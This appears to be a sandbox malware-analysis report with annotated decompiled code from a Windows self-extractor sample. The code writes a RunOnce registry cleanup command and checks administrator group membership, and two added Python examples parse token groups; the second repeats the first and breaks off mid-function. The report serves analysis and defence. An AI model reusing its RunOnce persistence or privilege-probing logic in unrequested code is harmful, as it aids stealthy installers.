					_t59 = _t63;
					E0013658A(_t61, _t63, _v276); // likely bounded append of the remainder to the output buffer
				} else {
					// value name pointer 0x131140 is not shown in this dump; data is written straight into the output buffer
					if(RegQueryValueExA(_v284, 0x131140, 0,  &_v280 /* type */, _t61,  &_v288 /* size, 0x104 */) == 0) {
						_t45 = _v280;
						if(_t45 != 2) { // 2 = REG_EXPAND_SZ
							L9:
							if(_t45 == 1) { // 1 = REG_SZ
								goto L10;
							}
						} else {
							if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
								_t45 = _v280; // expansion failed: buffer still holds the raw REG_EXPAND_SZ data
								goto L9;
							} else {
								_t59 = 0x104;
								E00131680(_t61, 0x104,  &_v268); // likely bounded copy of the expanded string back
								L10:
								_t50 = 1;
							}
						}
					}
					RegCloseKey(_v284);
					L15:
					if(_t50 == 0) {
						goto L16;
					}
				}
			}
		}
	}
	return E00136CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63); // stack cookie check and return
}
```
Instruction addresses of the decompiled lines above (in listing order): 0x00132773, 0x0013277e, 0x00132785, 0x0013278a, 0x0013278d, 0x00132790, 0x00132792, 0x00132798, 0x0013279d, 0x001328b2, 0x00000000, 0x001327a3, 0x001327a3, 0x001327af, 0x001327c2, 0x001327c8, 0x001327cd, 0x001327d5, 0x001328b7, 0x001328b9, 0x00000000, 0x001327db, 0x001327dd, 0x001328aa, 0x00000000, 0x001327e3, 0x001327e3, 0x001327ec, 0x001327f8, 0x00132803, 0x0013280b, 0x00132831, 0x001328c3
                                                                                                                                                                                                    0x001328c9
                                                                                                                                                                                                    0x001328cd
                                                                                                                                                                                                    0x00132837
                                                                                                                                                                                                    0x0013285a
                                                                                                                                                                                                    0x0013285c
                                                                                                                                                                                                    0x00132865
                                                                                                                                                                                                    0x00132892
                                                                                                                                                                                                    0x00132895
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00132867
                                                                                                                                                                                                    0x00132878
                                                                                                                                                                                                    0x0013288c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013287a
                                                                                                                                                                                                    0x00132880
                                                                                                                                                                                                    0x00132885
                                                                                                                                                                                                    0x00132897
                                                                                                                                                                                                    0x00132899
                                                                                                                                                                                                    0x00132899
                                                                                                                                                                                                    0x00132878
                                                                                                                                                                                                    0x00132865
                                                                                                                                                                                                    0x001328a0
                                                                                                                                                                                                    0x001328bf
                                                                                                                                                                                                    0x001328c1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001328c1
                                                                                                                                                                                                    0x00132831
                                                                                                                                                                                                    0x001327dd
                                                                                                                                                                                                    0x001327d5
                                                                                                                                                                                                    0x001328e5

APIs
• CharUpperA.USER32(E764604F,00000000,00000000,00000000), ref: 001327A8
• CharNextA.USER32(0000054D), ref: 001327B5
• CharNextA.USER32(00000000), ref: 001327BC
• RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00132829
• RegQueryValueExA.ADVAPI32(?,00131140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00132852
• ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00132870
• RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 001328A0
• GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 001328AA
• GetSystemDirectoryA.KERNEL32 ref: 001328B9
Strings
• Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 001327E4
Memory Dump Source
• Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
• Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
Similarity
• API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
• String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
• API String ID: 2659952014-2428544900
• Opcode ID: ce320c30489c9b6f91fbc59e7836603637f621d981d36d66c7455a88c4ce805e
• Instruction ID: a4d7256dc3e9ccbb6cbf51407fb72e9b0b2c79055d1f2d16991202e7c5061727
• Opcode Fuzzy Hash: ce320c30489c9b6f91fbc59e7836603637f621d981d36d66c7455a88c4ce805e
• Instruction Fuzzy Hash: 10418571A0012CAFDB24AB649C85AFA7BBDEF55700F4440E9F589D2110DB708EC58FA1
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 62%
			E00132267() {
				signed int _v8;
				char _v268;
				char _v836;
				void* _v840;
				int _v844;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t19;
				intOrPtr _t33;
				void* _t38;
				intOrPtr* _t42;
				void* _t45;
				void* _t47;
				void* _t49;
				signed int _t51;

				_t19 =  *0x138004; // 0xe764604f
				_t20 = _t19 ^ _t51;
				_v8 = _t19 ^ _t51;
				if( *0x138530 != 0) {
					_push(_t49);
					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
						_push(_t38);
						_v844 = 0x238;
						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
							_push(_t47);
							memset( &_v268, 0, 0x104);
							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
								E0013658A( &_v268, 0x104, 0x131140);
							}
							_push("C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");
							E0013171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
							_t42 =  &_v836;
							_t45 = _t42 + 1;
							_pop(_t47);
							do {
								_t33 =  *_t42;
								_t42 = _t42 + 1;
							} while (_t33 != 0);
							RegSetValueExA(_v840, "wextract_cleanup2", 0, 1,  &_v836, _t42 - _t45 + 1);
						}
						_t20 = RegCloseKey(_v840);
						_pop(_t38);
					}
					_pop(_t49);
				}
				return E00136CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
			}
0x00132272 0x00132277 0x00132279 0x00132283 0x00132289 0x001322ab 0x001322b1 0x001322c4 0x001322e0 0x001322e6 0x001322f5 0x0013230d 0x0013231c 0x0013231c 0x00132321 0x0013233a 0x00132342 0x00132348 0x0013234b 0x0013234c 0x0013234c 0x0013234e 0x0013234f 0x0013236e 0x0013236e 0x0013237a 0x00132380 0x00132380 0x00132381
                                                                                                                                                                                                    0x00132381
                                                                                                                                                                                                    0x0013238f

APIs
• RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 001322A3
• RegQueryValueExA.ADVAPI32(?,wextract_cleanup2,00000000,00000000,?,?,00000001), ref: 001322D8
• memset.MSVCRT ref: 001322F5
• GetSystemDirectoryA.KERNEL32 ref: 00132305
• RegSetValueExA.ADVAPI32(?,wextract_cleanup2,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 0013236E
• RegCloseKey.ADVAPI32(?), ref: 0013237A
Strings
• Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00132299
• wextract_cleanup2, xrefs: 0013227C, 001322CD, 00132363
• C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00132321
• rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 0013232D
Memory Dump Source
• Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
• Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
Similarity
• API ID: Value$CloseDirectoryOpenQuerySystemmemset
• String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup2
• API String ID: 3027380567-2274915764
• Opcode ID: d40d8f24653d46d558bf4801d9bf27267a6e1c2aeb0b5ba34a4bb9696fde9ce0
• Instruction ID: e661c8683f63d27f3241a8c2e4969c873152f721e227442dbdf6128115d39fad
• Opcode Fuzzy Hash: d40d8f24653d46d558bf4801d9bf27267a6e1c2aeb0b5ba34a4bb9696fde9ce0
• Instruction Fuzzy Hash: F731E671A00218BBDB25AB60DC89FEB7B7CEF18700F0001E9F54DA6050EB71AF88CA50
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 87%
			/* Dialog procedure of the self-extractor stub: _a4 = hWnd, _a8 = uMsg, _a12 = wParam. */
			E00133100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t8;
				void* _t11;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t33;
				struct HWND__* _t34;

				_t8 = _a8 - 0xf;                              /* 0x0F = WM_PAINT */
				if(_t8 == 0) {
					if( *0x138590 == 0) {                     /* one-shot flag: only on the first paint */
						/* 0xB1 = EM_SETSEL(-1, 0): clear the text selection in edit control 0x834 */
						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
						 *0x138590 = 1;
					}
					L13:
					return 0;
				}
				_t11 = _t8 - 1;                               /* 0x10 = WM_CLOSE */
				if(_t11 == 0) {
					L7:
					_push(0);                                 /* dialog result 0 (cancelled) */
					L8:
					EndDialog(_a4, ??);                       /* result is the value pushed at L7 or below */
					L9:
					return 1;
				}
				_t15 = _t11 - 0x100;                          /* 0x110 = WM_INITDIALOG */
				if(_t15 == 0) {
					_t16 = GetDesktopWindow();
					_t33 = _a4;
					E001343D0(_t33, _t16);                    /* position the dialog relative to the desktop */
					SetDlgItemTextA(_t33, 0x834,  *0x138d4c); /* message text from a global */
					SetWindowTextA(_t33, "nst0dum");          /* dialog title */
					SetForegroundWindow(_t33);
					_t34 = GetDlgItem(_t33, 0x834);
					/* 0xFFFFFFFC = GWL_WNDPROC (-4): subclass control 0x834, saving the original proc at 0x1388b8 */
					 *0x1388b8 = GetWindowLongA(_t34, 0xfffffffc);
					SetWindowLongA(_t34, 0xfffffffc, E001330C0);
					return 1;
				}
				if(_t15 != 1) {                               /* 0x111 = WM_COMMAND; anything else is unhandled */
					goto L13;
				}
				if(_a12 != 6) {                               /* 6 = IDYES */
					if(_a12 != 7) {                           /* 7 = IDNO */
						goto L9;
					}
					goto L7;                                  /* IDNO: end dialog with result 0 */
				}
				_push(1);                                     /* IDYES: end dialog with result 1 */
				goto L8;
			}

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EndDialog.USER32(?,00000000), ref: 0013313B
                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 0013314B
                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,00000834), ref: 0013316A
                                                                                                                                                                                                    • SetWindowTextA.USER32(?,nst0dum), ref: 00133176
                                                                                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 0013317D
                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000834), ref: 00133185
                                                                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000FC), ref: 00133190
                                                                                                                                                                                                    • SetWindowLongA.USER32(00000000,000000FC,001330C0), ref: 001331A3
                                                                                                                                                                                                    • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 001331CA
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
• Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                    • String ID: nst0dum
                                                                                                                                                                                                    • API String ID: 3785188418-432003757
                                                                                                                                                                                                    • Opcode ID: 5b881f12375639d4df1826e0111696700f23c31a7a3be9e0bdbf500c35439c99
                                                                                                                                                                                                    • Instruction ID: 9126e1384488f421dc2470af5d26a171034966af69b532144778191870f11a70
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5b881f12375639d4df1826e0111696700f23c31a7a3be9e0bdbf500c35439c99
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7811E631248211BBDB11AF24DC0CFAA3A64FF5A731F500610F875E19E0DBB49781D74A
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 91%
			// Decides whether the current process token carries BUILTIN\Administrators
			// (S-1-5-32-544) and caches the answer in the global at 0x138128: 2 means
			// "not evaluated yet", 1 means the group was found. The helper E001317EE and
			// the epilogue E00136CE0 (stack-cookie check on _v8) live elsewhere in the image.
			E001318A3(void* __edx, void* __esi) {
				signed int _v8;                          // stack cookie (ebp ^ __security_cookie)
				short _v12;                              // last two bytes of the SID authority
				struct _SID_IDENTIFIER_AUTHORITY _v16;   // becomes SECURITY_NT_AUTHORITY {0,0,0,0,0,5}
				char _v20;                               // result flag returned to the caller
				long _v24;                               // required / actual TOKEN_GROUPS size
				void* _v28;                              // process token handle
				void* _v32;                              // PSID for BUILTIN\Administrators
				void* __ebx;
				void* __edi;
				void* _t15;                              // &Groups[0] (decompiler temporary)
				signed int _t23;
				signed int _t25;                         // cached global / return value
				long _t45;                               // group index
				void* _t49;
				int _t50;                                // 2 = TokenGroups; later reused as array cursor
				void* _t51;
				void* _t52;                              // TOKEN_GROUPS buffer
				signed int _t53;                         // frame pointer mixed into the cookie

				_t51 = __esi;
				_t49 = __edx;
				_t23 =  *0x138004; // 0xe764604f  __security_cookie
				_v8 = _t23 ^ _t53;
				_t25 =  *0x138128; // 0x2  cached result, 2 = not computed yet
				_t45 = 0;
				// Authority = dword 0 at _v16 followed by word 0x500 at _v12; little-endian
				// that is 00 00 00 00 00 05, i.e. SECURITY_NT_AUTHORITY.
				_v12 = 0x500;
				_t50 = 2;                                // TokenGroups
				_v16.Value = 0;
				_v20 = 0;
				if(_t25 != _t50) {
					L20:
					// Already evaluated on an earlier call: return the cached value.
					return E00136CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
				}
				if(E001317EE( &_v20) != 0) {
					// The helper answered the question itself; cache a positive result.
					_t25 = _v20;
					if(_v20 != 0) {
						 *0x138128 = 1;
					}
					goto L20;
				}
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {   // 8 = TOKEN_QUERY
					goto L20;
				}
				// First call with a NULL buffer only sizes the TOKEN_GROUPS structure; any
				// outcome other than ERROR_INSUFFICIENT_BUFFER (0x7a) is treated as failure.
				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
					L17:
					CloseHandle(_v28);
					_t25 = _v20;
					goto L20;
				} else {
					_push(__esi);                        // register save (decompiler artifact)
					_t52 = LocalAlloc(0, _v24);
					if(_t52 == 0) {
						L16:
						_pop(_t51);
						goto L17;
					}
					// Second call fills the buffer; then build S-1-5-32-544 from
					// SECURITY_BUILTIN_DOMAIN_RID (0x20) and DOMAIN_ALIAS_RID_ADMINS (0x220).
					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
						L15:
						LocalFree(_t52);
						goto L16;
					} else {
						if( *_t52 <= 0) {                // TOKEN_GROUPS.GroupCount
							L14:
							FreeSid(_v32);
							goto L15;
						}
						_t15 = _t52 + 4; // 0x4           &Groups[0].Sid
						_t50 = _t15;
						// Walk the SID_AND_ATTRIBUTES array (8 bytes per entry on x86) comparing
						// only the Sid; the Attributes field is never read, so an entry that is
						// present as SE_GROUP_USE_FOR_DENY_ONLY (a UAC-filtered admin token) matches too.
						while(EqualSid( *_t50, _v32) == 0) {
							_t45 = _t45 + 1;
							_t50 = _t50 + 8;
							if(_t45 <  *_t52) {
								continue;
							}
							goto L14;                    // no match in any group
						}
						 *0x138128 = 1;                  // match: cache and report "administrator"
						_v20 = 1;
						goto L14;
					}
				}
			}
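The routine above enumerates TOKEN_GROUPS and compares each entry's Sid with S-1-5-32-544 through EqualSid, never reading the Attributes field. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it rebuilds the same SID bytes from the constants the sample hands to AllocateAndInitializeSid, parses constructed x86 TOKEN_GROUPS blobs laid out the way the sample walks them (4-byte GroupCount, then 8-byte SID_AND_ATTRIBUTES entries), and contrasts the SID-only test with one that honours the attributes. The three token blobs, and the use of blob offsets where a real buffer holds absolute Sid pointers, are constructed for illustration.

```python
"""Parse x86 TOKEN_GROUPS blobs and test for BUILTIN\\Administrators (S-1-5-32-544),
first the way the decompiled routine does (SID only), then honouring group attributes.
Every buffer here is constructed for the example; nothing is read from a live token."""
import struct

# Constants the sample passes to AllocateAndInitializeSid: authority 5 (SECURITY_NT_AUTHORITY),
# sub-authorities 0x20 (SECURITY_BUILTIN_DOMAIN_RID) and 0x220 (DOMAIN_ALIAS_RID_ADMINS).
SECURITY_NT_AUTHORITY = bytes([0, 0, 0, 0, 0, 5])
SECURITY_WORLD_SID_AUTHORITY = bytes([0, 0, 0, 0, 0, 1])
SECURITY_BUILTIN_DOMAIN_RID = 0x20
DOMAIN_ALIAS_RID_ADMINS = 0x220
DOMAIN_ALIAS_RID_USERS = 0x221
# SID_AND_ATTRIBUTES.Attributes flags from winnt.h
SE_GROUP_MANDATORY = 0x1
SE_GROUP_ENABLED_BY_DEFAULT = 0x2
SE_GROUP_ENABLED = 0x4
SE_GROUP_USE_FOR_DENY_ONLY = 0x10

# The sample stores the authority as a dword 0 followed by the word 0x500; little-endian
# that is 00 00 00 00 00 05, i.e. SECURITY_NT_AUTHORITY.
SAMPLE_AUTHORITY = struct.pack("<IH", 0, 0x500)


def build_sid(authority: bytes, *subauths: int) -> bytes:
    """Binary SID: Revision(1) SubAuthorityCount(1) IdentifierAuthority(6, big-endian)
    SubAuthority[n] as little-endian dwords, as AllocateAndInitializeSid lays it out."""
    return bytes([1, len(subauths)]) + authority + b"".join(struct.pack("<I", s) for s in subauths)


def sid_to_string(sid: bytes) -> str:
    """Render a binary SID in the usual S-R-A-S... form."""
    count = sid[1]
    authority = int.from_bytes(sid[2:8], "big")
    subs = struct.unpack_from("<%dI" % count, sid, 8)
    return "S-%d-%d" % (sid[0], authority) + "".join("-%d" % s for s in subs)


ADMINS_SID = build_sid(SECURITY_NT_AUTHORITY, SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS)
USERS_SID = build_sid(SECURITY_NT_AUTHORITY, SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_USERS)
EVERYONE_SID = build_sid(SECURITY_WORLD_SID_AUTHORITY, 0)


def build_token_groups(groups) -> bytes:
    """Construct an x86 TOKEN_GROUPS blob: DWORD GroupCount, then GroupCount entries of
    SID_AND_ATTRIBUTES {PSID Sid; DWORD Attributes} (8 bytes each, the stride the sample
    uses), with the SID bodies appended after the array. Sid fields hold offsets into the
    blob here; a buffer returned by GetTokenInformation holds absolute pointers instead."""
    count = len(groups)
    entries, sid_area = b"", b""
    for sid, attrs in groups:
        offset = 4 + 8 * count + len(sid_area)
        entries += struct.pack("<II", offset, attrs)
        sid_area += sid
    return struct.pack("<I", count) + entries + sid_area


def parse_token_groups(blob: bytes):
    """Yield (sid, attributes) per entry, following each Sid offset into the blob."""
    (count,) = struct.unpack_from("<I", blob, 0)
    for i in range(count):
        sid_off, attrs = struct.unpack_from("<II", blob, 4 + 8 * i)
        sid_size = 8 + 4 * blob[sid_off + 1]          # 8-byte header + SubAuthorityCount dwords
        yield blob[sid_off:sid_off + sid_size], attrs


def has_admin_sid(blob: bytes) -> bool:
    """The sample's test: EqualSid on each Groups[i].Sid, Attributes never read."""
    return any(sid == ADMINS_SID for sid, _ in parse_token_groups(blob))


def is_admin_effective(blob: bytes) -> bool:
    """Attribute-aware test: the Administrators entry must be enabled and not deny-only."""
    for sid, attrs in parse_token_groups(blob):
        if sid == ADMINS_SID:
            return bool(attrs & SE_GROUP_ENABLED) and not attrs & SE_GROUP_USE_FOR_DENY_ONLY
    return False


ENABLED = SE_GROUP_MANDATORY | SE_GROUP_ENABLED_BY_DEFAULT | SE_GROUP_ENABLED
# Constructed tokens: an elevated administrator, the same user's UAC-filtered token
# (Administrators present but deny-only), and a plain standard user.
ELEVATED_TOKEN = build_token_groups([(EVERYONE_SID, ENABLED), (ADMINS_SID, ENABLED)])
FILTERED_TOKEN = build_token_groups([(EVERYONE_SID, ENABLED), (USERS_SID, ENABLED),
                                     (ADMINS_SID, SE_GROUP_USE_FOR_DENY_ONLY)])
STANDARD_USER_TOKEN = build_token_groups([(EVERYONE_SID, ENABLED), (USERS_SID, ENABLED)])

if __name__ == "__main__":
    print(sid_to_string(ADMINS_SID))
    for name, blob in (("elevated", ELEVATED_TOKEN), ("filtered", FILTERED_TOKEN),
                       ("standard", STANDARD_USER_TOKEN)):
        print(name, "sid-only:", has_admin_sid(blob), "effective:", is_admin_effective(blob))
```

The SID-only test reports the filtered token as administrative although that process runs at medium integrity with the group usable only for deny ACEs. On a live system the attribute-aware equivalent is CheckTokenMembership(NULL, pAdminSid, &IsMember), which performs an access check and therefore does not count a deny-only entry.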

                                                                                                                                                                                                    0x0013198a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013198c
                                                                                                                                                                                                    0x00131991
                                                                                                                                                                                                    0x00131996
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00131996
                                                                                                                                                                                                    0x0013194c

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 001317EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,001318DD), ref: 0013181A
                                                                                                                                                                                                      • Part of subcall function 001317EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0013182C
                                                                                                                                                                                                      • Part of subcall function 001317EE: AllocateAndInitializeSid.ADVAPI32(001318DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,001318DD), ref: 00131855
                                                                                                                                                                                                      • Part of subcall function 001317EE: FreeSid.ADVAPI32(?,?,?,?,001318DD), ref: 00131883
                                                                                                                                                                                                      • Part of subcall function 001317EE: FreeLibrary.KERNEL32(00000000,?,?,?,001318DD), ref: 0013188A
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 001318EB
                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 001318F2
                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 0013190A
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00131918
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000000,?,?), ref: 0013192C
                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00131944
                                                                                                                                                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00131964
                                                                                                                                                                                                    • EqualSid.ADVAPI32(00000004,?), ref: 0013197A
                                                                                                                                                                                                    • FreeSid.ADVAPI32(?), ref: 0013199C
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 001319A3
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 001319AD
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2168512254-0
                                                                                                                                                                                                    • Opcode ID: d1872409125b375792f17fa3d196e8f51d7b228486bf4133fbf0cf69051ec2d1
                                                                                                                                                                                                    • Instruction ID: 80fb219690d8e7948ec90ec67006d2604dbac63b34738a817a750be045ee40ca
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d1872409125b375792f17fa3d196e8f51d7b228486bf4133fbf0cf69051ec2d1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D310971A00209BFDB209FA5DC98AAFBBBCFF08714F504429F585D2160DB319955CB61
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%
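The API sequence recorded above is a hand-rolled BUILTIN\Administrators membership test: OpenProcessToken on the current process, GetTokenInformation with class 2 (TokenGroups) called twice (the first call with a NULL buffer fails with the required size, which GetLastError/LocalAlloc pick up), AllocateAndInitializeSid with two sub-authorities 0x20 and 0x220 (SECURITY_BUILTIN_DOMAIN_RID and DOMAIN_ALIAS_RID_ADMINS), then EqualSid against the group list. The subcall E001317EE resolves CheckTokenMembership from advapi32.dll at run time with the same SID, the usual primary path with the manual scan as fallback. The Python below is an added example, not code from the sample or from the Joe Sandbox report: it builds that SID byte for byte (the identifier authority is passed by pointer and not visible in the call record; with RIDs 32 and 544 it is assumed to be SECURITY_NT_AUTHORITY, value 5), decodes it to S-1-5-32-544, lays out and parses a 32-bit TOKEN_GROUPS buffer (the group contents and the buffer address 0x00410000 are constructed, not captured), and contrasts a plain EqualSid scan with the attribute-aware answer CheckTokenMembership gives. Whether the sample's loop looks at the Attributes field cannot be read off the API list; the difference matters because a UAC-filtered administrator token still carries S-1-5-32-544, marked SE_GROUP_USE_FOR_DENY_ONLY.

```python
import struct

# Constants behind the AllocateAndInitializeSid call in the report:
# authority {0,0,0,0,0,5} (assumed), sub-authorities 0x20 and 0x220 -> S-1-5-32-544 (BUILTIN\Administrators)
SECURITY_NT_AUTHORITY = 5
SECURITY_BUILTIN_DOMAIN_RID = 0x20
DOMAIN_ALIAS_RID_ADMINS = 0x220
DOMAIN_ALIAS_RID_USERS = 0x221

# SID_AND_ATTRIBUTES.Attributes bits that decide whether a group is effective
SE_GROUP_MANDATORY = 0x1
SE_GROUP_ENABLED_BY_DEFAULT = 0x2
SE_GROUP_ENABLED = 0x4
SE_GROUP_USE_FOR_DENY_ONLY = 0x10


def allocate_and_initialize_sid(authority, *sub_authorities):
    """Build a binary SID with the layout AllocateAndInitializeSid produces:
    Revision(1) SubAuthorityCount(1) IdentifierAuthority(6, big-endian) SubAuthority[n] (little-endian DWORDs)."""
    if not 1 <= len(sub_authorities) <= 15:
        raise ValueError("a SID carries 1..15 sub-authorities")
    body = b"".join(struct.pack("<I", rid) for rid in sub_authorities)
    return bytes([1, len(sub_authorities)]) + authority.to_bytes(6, "big") + body


def sid_to_string(sid):
    """Decode a binary SID to its string form, e.g. S-1-5-32-544."""
    revision, count = sid[0], sid[1]
    authority = int.from_bytes(sid[2:8], "big")
    subs = struct.unpack_from("<%dI" % count, sid, 8)
    return "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs)


def equal_sid(a, b):
    """EqualSid: two valid SIDs are equal when revision, authority and every sub-authority match."""
    return a == b


ADMINISTRATORS = allocate_and_initialize_sid(SECURITY_NT_AUTHORITY, SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS)
USERS = allocate_and_initialize_sid(SECURITY_NT_AUTHORITY, SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_USERS)
EVERYONE = allocate_and_initialize_sid(1, 0)  # S-1-1-0, World authority


def build_token_groups(base, groups):
    """Lay out a 32-bit TOKEN_GROUPS buffer as GetTokenInformation(hToken, TokenGroups) fills it:
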